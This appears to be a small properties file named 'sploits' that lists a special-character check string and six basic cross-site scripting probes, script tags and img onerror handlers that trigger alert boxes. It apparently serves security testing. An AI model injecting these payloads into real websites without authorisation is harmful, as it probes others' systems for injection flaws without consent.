title=sploits
charCheck=<>"'()/\[]#&%
basicXSS_1=<script>alert(123);</script>
basicXSS_2=<script>alert("XSS");</script>
basicXSS_3=<script>alert(/XSS/);</script>
imgXSS_1=<img src=a onerror=alert(123); />
imgXSS_2=<img src=a onerror=alert("XSS"); />
imgXSS_3=<img src=a onerror=alert(/XSS/); />
